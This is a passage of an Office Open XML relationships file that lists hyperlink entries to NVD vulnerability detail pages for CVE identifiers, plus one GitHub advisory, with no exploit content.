Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89257" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89264" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89265" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90443" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90446" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90450" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90454" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-vfm7-4h43-gp6m" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68535" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73317" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73319" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73320" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81915" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81916" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81917" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82469" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82470" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89148" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89246" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90453" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45057" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82467" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82468" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89298" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78546" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81918" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86813" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78452" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78547" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88914" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-12145" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14566" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19946" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49439" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62113" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62134" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62139" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66798" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78455" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84646" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8615" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9160" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89092" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89169" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78124" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78127" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78131" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15695" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89151" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79693" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11765" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89162" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48707" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58616" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86231" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86779" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89145" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44911" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85383" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85408" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86172" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86212" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86236" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86241" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86281" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86289" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86294" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86310" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86514" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86668" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86674" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87923" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9215" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9216" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-62198" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-66336" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-69904" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71378" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13676" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39835" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40983" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40984" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48043" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54513" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56340" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56665" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56666" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56825" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56826" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56827" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56828" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56829" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56830" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56831" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59148" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59149" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59151" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59971" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59973" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61534" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79362" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80927" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80930" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80934" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80938" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80939" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80940" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80941" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80942" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80946" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80948" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80949" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80951" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80956" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80957" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80960" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80963" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80964" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80965" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80966" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80968" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80969" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80970" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80972" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80973" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80974" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80983" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80984" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80988" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80990" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80993" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80996" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80999" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81005" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81009" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81013" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81014" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81018" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87122" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89437" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89438" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89439" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89444" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89446" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89447" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89449" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89451" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89453" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89454" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89455" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89457" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89458" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89460" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89461" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89462" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89463" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89464" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89467" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89468" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89473" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89474" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89475" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89484" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89490" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89491" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89496" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89498" TargetMode="External" Id="rId996" /><Relationship 